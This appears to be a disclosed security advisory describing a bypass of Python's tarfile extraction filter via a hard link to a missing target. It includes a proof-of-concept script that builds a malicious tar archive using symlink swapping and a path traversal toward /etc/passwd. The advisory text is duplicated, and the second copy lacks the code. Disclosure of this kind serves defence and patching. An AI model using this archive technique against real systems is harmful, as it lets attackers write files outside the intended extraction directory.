Summary
Python's TarFile.extractall()
and TarFile.extract()
methods support a feature that allows a filter to be set to improve the safety of using these methods.
A bug in how links are processed allows for the filter to be bypassed in some limited cases, and allows for objects to be created under directories that differ to their intended location.
The bypass is triggered when a hard link is being created that points to a file that does not exist. The existence of a file can be manipulated by changing a symlink during extraction.
The bypass does not apply to the hard link path validation, but does affect other validation that may occur - such as excluding file types, changing modes, etc.
Severity
Moderate - Should be fixed, but not serious in nature.
1. Create the tar file
In Python run the following code to create a tar file that demonstrates the vulnerability. This tar file will create a symlink that bypasses symlink link destination checking.
import tarfile
with tarfile.open("poc-hardlink-bypass.tar", mode="x:") as tar:
# Create a deep directory structure so the c/escape symlink stays inside the path
a = tarfile.TarInfo("a/t/t/t/t/t/t/t/t/t/t/dummy")
a.size = 0
a.type = tarfile.REGTYPE
tar.addfile(a)
# Create a dummy file that creates the b directory (I am lazy)
b = tarfile.TarInfo("b/dummy")
a.size = 0
a.type = tarfile.REGTYPE
tar.addfile(b)
# Point "c" to the bottom of the tree in "a"
ca = tarfile.TarInfo("c")
ca.type = tarfile.SYMTYPE
ca.linkname = "a/t/t/t/t/t/t/t/t/t/t"
tar.addfile(ca)
# Create a symlink. At this point the link should point to a non-existant location under "a"
cescape = tarfile.TarInfo("c/escape")
cescape.type = tarfile.SYMTYPE
cescape.linkname = "../../../../../../../../etc/passwd"
tar.addfile(cescape)
# Move "c" to point to "b". This means "c/escape" no longer exists.
cb = tarfile.TarInfo("c")
cb.type = tarfile.SYMTYPE
cb.linkname = "b"
tar.addfile(cb)
# Attempt to create a hard link to "c/escape". Since it doesn't exist it
# will basically create "cescape" but at "boom". Which means the directory
# traversal now escapes the destination path.
boom = tarfile.TarInfo("boom")
boom.type = tarfile.LNKTYPE
boom.linkname = "c/escape"
tar.addfile(boom)
2. Extract the tar file
Change into a new directory (e.g. mkdir poc; cd poc
) and run the following in Python to
decompress the tar created above.
import tarfile
tarfile.open("../poc-hardlink-bypass.tar", mode="r").extractall(".", filter="data")
Further Analysis
When extracting a hard link from a tar archive using extractall()
or extract()
the function TarFile.makelink()
is called.
Before calling os.link()
to create a hard link it checks for the existence of the link target by calling os.path.lexist()
.
If the link target does not exist, rather than creating the link target and then creating the hard link to the link target, the link target is fetched using TarFile._find_link_target()
and extracted directly using TarFile._extract_member()
at the location of where the hard link would have been created.
This call to TarFile._extract_member()
does not pass through the filter method.
This means that by carefully crafting the link target member in the tar file, an attacker can bypass security controls.
TarFile._find_link_target()
is challenging to call with a hard link. The search for the link target is restricted to the members that appear before the hard link in the tar file. This means if extractall()
is being used the link target member must successfully be extractable. This is not required if extract()
is used.
This technique can not be used to create a hard link outside of the destination path. Hard links depend on TarInfo._link_target
being present. However this attribute is only set in TarFile._get_extract_tarinfo()
, which is not called.
Timeline
Date reported: 2025-05-02
Date fixed:
Date disclosed: 2025-07-31
Summary
Python's
TarFile.extractall()
andTarFile.extract()
methods support a feature that allows a filter to be set to improve the safety of using these methods.A bug in how links are processed allows for the filter to be bypassed in some limited cases, and allows for objects to be created under directories that differ to their intended location.
The bypass is triggered when a hard link is being created that points to a file that does not exist. The existence of a file can be manipulated by changing a symlink during extraction.
The bypass does not apply to the hard link path validation, but does affect other validation that may occur - such as excluding file types, changing modes, etc.
Severity
Moderate - Should be fixed, but not serious in nature.
1. Create the tar file
In Python run the following code to create a tar file that demonstrates the vulnerability. This tar file will create a symlink that bypasses symlink link destination checking.
2. Extract the tar file
Change into a new directory (e.g.
mkdir poc; cd poc
) and run the following in Python todecompress the tar created above.
Further Analysis
When extracting a hard link from a tar archive using
extractall()
orextract()
the functionTarFile.makelink()
is called.Before calling
os.link()
to create a hard link it checks for the existence of the link target by callingos.path.lexist()
.If the link target does not exist, rather than creating the link target and then creating the hard link to the link target, the link target is fetched using
TarFile._find_link_target()
and extracted directly usingTarFile._extract_member()
at the location of where the hard link would have been created.This call to
TarFile._extract_member()
does not pass through the filter method.This means that by carefully crafting the link target member in the tar file, an attacker can bypass security controls.
TarFile._find_link_target()
is challenging to call with a hard link. The search for the link target is restricted to the members that appear before the hard link in the tar file. This means ifextractall()
is being used the link target member must successfully be extractable. This is not required ifextract()
is used.This technique can not be used to create a hard link outside of the destination path. Hard links depend on
TarInfo._link_target
being present. However this attribute is only set inTarFile._get_extract_tarinfo()
, which is not called.Timeline
Date reported: 2025-05-02
Date fixed:
Date disclosed: 2025-07-31